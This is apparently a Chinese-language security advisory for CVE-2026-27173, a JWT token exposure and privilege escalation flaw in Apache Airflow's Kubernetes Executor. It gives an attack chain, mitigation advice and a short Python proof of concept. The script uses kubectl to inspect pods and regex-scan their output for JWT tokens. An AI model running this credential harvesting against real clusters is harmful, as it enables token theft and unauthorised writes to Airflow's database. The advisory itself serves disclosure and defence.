CVE-2026-27173 CVSS 8.7 高危

CVE-2026-27173 Apache Airflow JWT信息泄露与权限提升

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27173

漏洞类型

权限提升

CVSS评分

8.7 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Apache Airflow

漏洞概述

Apache Airflow 在使用 Kubernetes Executor 时存在严重权限提升漏洞。由于系统配置缺陷，用于 workers 认证的 JWT tokens 错误地暴露给了仅拥有 Kubernetes Pods 只读权限的用户。攻击者可利用泄露的 token 通过 Task SDK 执行特权操作，甚至修改 Airflow 数据库状态，导致系统机密性与完整性受损。

技术细节

该漏洞的核心在于 Kubernetes 环境下的敏感信息隔离失效。在 Apache Airflow 的 Kubernetes Executor 架构中，Worker Pods 需要使用 JWT token 与服务端进行通信认证。根据漏洞描述，这些 tokens 被意外放置在了只读用户可访问的上下文中（如 Pod 环境变量或日志文件）。由于攻击向量为本地（AV:L）且所需权限较低（PR:L），攻击者只需具备 Pod 的读取权限即可获取这些高价值的凭证。一旦截获 JWT，攻击者即可绕过正常的身份验证机制，利用 Task SDK 接口模拟合法任务进程。这不仅打破了“只读”的权限边界，还允许攻击者对 Airflow 数据库执行写入操作（I:H），从而完全控制工作流状态，造成严重的数据泄露或破坏。

攻击链分析

STEP 1

步骤1

攻击者获取Kubernetes集群的有限访问权限，能够读取Pods信息。

STEP 2

步骤2

攻击者枚举Airflow命名空间中的Pods资源。

STEP 3

步骤3

攻击者读取Pod定义或日志，从中提取暴露的JWT Tokens。

STEP 4

步骤4

攻击者使用获取的JWT通过Task SDK进行身份验证。

STEP 5

步骤5

攻击者执行特权操作，修改Airflow数据库状态。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
PoC for CVE-2026-27173: Apache Airflow JWT Token Exposure
This script demonstrates how a user with read-only access to K8s pods
might extract sensitive JWT tokens.
"""

import subprocess
import re

def get_pods_in_namespace(namespace):
    # List all pods in the target namespace (requires read access)
    cmd = f"kubectl get pods -n {namespace} -o json"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout

def inspect_pod_for_jwt(namespace, pod_name):
    # Describe the pod to check environment variables and mounts
    cmd = f"kubectl describe pod {pod_name} -n {namespace}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    output = result.stdout
    
    # Simple regex to look for JWT patterns (Bearer token)
    jwt_pattern = r"ey[A-Za-z0-9-_=]+\.[A-Za-z0-9-_=]+\.?[A-Za-z0-9-_.+/=]*"
    tokens = re.findall(jwt_pattern, output)
    
    if tokens:
        print(f"[+] Found potential JWT in pod {pod_name}:")
        for token in tokens:
            print(f"Token: {token[:50]}...")
    else:
        print(f"[-] No JWT found in description of {pod_name}")

if __name__ == "__main__":
    target_namespace = "airflow"
    print(f"[*] Scanning namespace: {target_namespace}")
    print("[!] Attempting to list pods (requires kubectl configured and read permissions)")
    # In a real scenario, parse JSON output to get pod names
    # and loop through them calling inspect_pod_for_jwt
    print("[!] If pods are accessible, check 'env' and 'volumes' sections for tokens.")

影响范围

Apache Airflow (具体受影响版本请参考官方公告)

防御指南

临时缓解措施

建议立即检查 Kubernetes 集群的 RBAC 配置，撤销非必要用户的 Pods 只读权限。同时，排查 Airflow Worker Pods 的环境变量和持久化卷，确认是否包含明文 JWT，如有发现，应立即轮换这些凭证。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表